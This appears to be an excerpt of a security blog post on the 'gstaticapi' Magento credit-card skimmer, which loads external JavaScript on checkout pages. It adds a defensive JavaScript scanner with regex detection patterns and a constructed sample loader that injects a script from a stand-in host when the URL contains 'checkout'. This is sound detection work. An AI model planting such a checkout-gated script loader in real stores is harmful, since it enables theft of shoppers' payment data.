Magento Credit Card Stealing Malware: gstaticapi

Our team recently came across a malicious script titled gstaticapi on a Magento website. It targeted the checkout process to capture information and exfiltrate it.

To obtain sensitive details, the malware loads external JavaScript whenever the URL contains “checkout”. This location typically corresponds to the step in Magento’s checkout process where users enter their credit card information and shipping details.

As seen above, the first if statement looks for the checkout string in the URL using window.location.href.indexOf.
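
A heuristic check for the pattern described above, as an added example that is not from the original post or from Sucuri: it flags script text that tests the URL for "checkout" with location.href.indexOf, creates a script element, and references a host outside an allowlist. The allowlist hosts, the function names and both sample snippets are constructed assumptions, not the actual malware.

```javascript
// Added example: heuristic scanner for checkout-gated external script loaders.
// Hosts the store is expected to load scripts from (assumed allowlist).
const ALLOWED_HOSTS = new Set(['www.example-store.test', 'js.example-payments.test']);

// The condition described in the post: location.href.indexOf('...checkout...')
const CHECKOUT_GATE = /location\s*\.\s*href\s*\.\s*indexOf\s*\(\s*(['"`])[^'"`]*checkout[^'"`]*\1/i;
// Dynamic script creation, a common way to pull in external JavaScript.
const SCRIPT_INJECT = /createElement\s*\(\s*(['"`])script\1\s*\)/i;
// Absolute or protocol-relative URLs that appear as string literals.
const URL_LITERAL = /(['"`])((?:https?:)?\/\/[^'"`\s]+)\1/gi;

// Collect the distinct hostnames referenced by URL literals in the source.
function externalHosts(source) {
  const hosts = new Set();
  for (const m of source.matchAll(URL_LITERAL)) {
    try {
      const raw = m[2].startsWith('//') ? 'https:' + m[2] : m[2];
      hosts.add(new URL(raw).hostname.toLowerCase());
    } catch (_) { /* not a parseable URL; ignore */ }
  }
  return [...hosts];
}

// Suspicious only when all three signals are present together.
function scanScript(source, allowed = ALLOWED_HOSTS) {
  const gated = CHECKOUT_GATE.test(source);
  const injects = SCRIPT_INJECT.test(source);
  const unknownHosts = externalHosts(source).filter((h) => !allowed.has(h));
  return { gated, injects, unknownHosts,
           suspicious: gated && injects && unknownHosts.length > 0 };
}

// Constructed samples: same shape, different script origin.
const SAMPLE_UNKNOWN_HOST =
  "if (window.location.href.indexOf('checkout') > -1) {" +
  " var s = document.createElement('script');" +
  " s.src = 'https://unknown-host.example/a.js';" +
  " document.head.appendChild(s); }";
const SAMPLE_ALLOWED_HOST = SAMPLE_UNKNOWN_HOST.replace(
  'https://unknown-host.example/a.js', '//js.example-payments.test/v1.js');

console.log(scanScript(SAMPLE_UNKNOWN_HOST));
console.log(scanScript(SAMPLE_ALLOWED_HOST));
```

A string match like this only catches unobfuscated loaders, so treat a hit as a lead for manual review and pair it with file-integrity monitoring of the store's templates and JavaScript.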

Continue reading Magento Credit Card Stealing Malware: gstaticapi at Sucuri Blog.

Story added 25 September 2020. The full text is available from the content source linked above.